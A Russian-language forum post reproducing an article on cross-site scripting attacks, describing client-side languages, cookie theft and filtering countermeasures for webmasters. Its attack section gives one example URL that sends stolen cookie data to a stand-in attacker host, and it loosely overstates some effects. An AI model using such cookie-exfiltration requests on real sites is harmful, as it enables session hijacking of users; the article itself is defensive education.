Показано с 1 по 1 из 1.

WEB Атаки класса Cross-Site-Scripting::.

  1. #1
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SDA
    Регистрация
    07.01.2005
    Адрес
    Москва
    Сообщений
    7,168
    Вес репутации
    3189

    Exclamation WEB Атаки класса Cross-Site-Scripting::.

    Во многих багтраках часто проскакивают уязвимости класса CSS. Многие люди,
    интересующиеся вопросами защиты информации, просто игнорируют данный класс атак.
    В данной статье я хочу привлечь их внимание к последствиям, к которым
    может привести использование WEB-приложений с ошибками программирования,
    а также указать меры противодействия данному классу атак.


    Cross-Site-Scripting - сценарий на стороне клиента, позволяющий выполнить
    клиентский код в пределах ВЕБ-среды пользователя.


    Клиентские языки включают в себя:
    - VBScript
    - DHTML / HTML / XHTML
    - JavaScript
    - Java-апплеты
    - Flash
    - ActiveX
    - XML/XSL
    - CSS

    Целью атаки может служить:
    - HTTP-клиент
    - WEB-броузер
    - Пользователь WEB-службы


    Cross-Site-Scripting относится к классу HTTP-атак.
    Задача атакующего заключается в том, чтобы модифицировать
    введенные данные, которые будут переданы WEB-приложению таким образом,
    чтобы заставить его выполнить код на языке HTTP клиента в пределах пользовательской
    Web среды, достигающей того же самого уровня доступа и привилегий как основной домен.


    Клиентские языки обладают большим количеством способностей для изменения
    содержания, структуры и стиля веб-страницы.
    Взаимосвязи клиентских языков создают увеличенных уровень доступа в пределах
    и вне доступного прикладного интерфейса (Document Object Model (DOM)), что
    позволяет читать и изменять данные, а также удаленно выполнять команды на сервере.



    Нападение:


    Примеров здесь можно привести море. Достаточно зайти на сайты типа BugTraq и
    ввести в поиске что-то типа "CSS" или "Cross-Site-Scripting".


    Я же хочу привести в пример cookies, потому как статей про это я читал мало.
    Множество WEB-приложений используют cookies, чтобы хранить HTTP состояние
    в течение сеанса пользователя. Это встречается часто в форумах, когда для каждого
    пользователя создается cookies файл, использующийся для его авторизации.


    Ткой сеанс может быть похищен и проанализирован атакующим, далее модифицирован
    и применен для вторжения в систему.


    Cookies маркированы доменом, от которого они были установлены. Программы Web
    просмотра или HTTP клиенты ограничивают просмотр сookies.


    Неконтролируемые входящие данные открывают доступ к данным cookie
    на домене, таким образом, перехватывая cookie.


    То есть атакующий создает программный код, позволяющий забрать cookies
    c сервера, после чего, модифицировав их, снова передать в качестве
    входного параметра запросом вида:


    http://www.hacker.com/cgi-bin/cookie...IE=cookie_data


    Привлекательность данного метода заключается в том, что атаку данного класса можно
    реализовать разными способами, не оставляя никаких логов в системе.


    Борьба с атаками класса Cross-Site-Scripting:


    I // Если WEB-приложение допускает ввод HTML-тегов //


    Это самый опасный в плане безопасности вариант.
    В этом случае необходимо:

    - Разрешить только безопасные HTML тэги и атрибуты
    - Фильтровать любой ввод JavaScript/Java/VBScript/ActiveX/Flash
    - Фильтровать двойные и одинарные кавычки
    - Удалять все нулевые символы


    II // Если WEB-приложение не допускает ввод HTML-тегов //


    Здесь ситуация менее опасная, однако необходимо:

    - Фильтровать все HTML-символы: ">" = > > " <
    - Фильтровать двойные и одинарные кавычки
    - Удалять все нулевые символы


    Статья написана в помощь WEB-мастерам и системным администраторам. Целью статьи
    является привлечь их внимание к вопросу обеспечения защиты от атак класса
    Cross-Site-Scripting.


    CopKiller

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

Похожие темы

  1. LG KM900 Arena: возможности S-класса в неоднозначном окружении
    От SDA в разделе Лечение и защита мобильных устройств
    Ответов: 0
    Последнее сообщение: 16.05.2009, 13:49
  2. Mozilla Firefox "jar:" Protocol Handling Cross-Site Scripting Security Issue
    От ALEX(XX) в разделе Уязвимости
    Ответов: 19
    Последнее сообщение: 27.11.2007, 21:24

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00512 seconds with 17 queries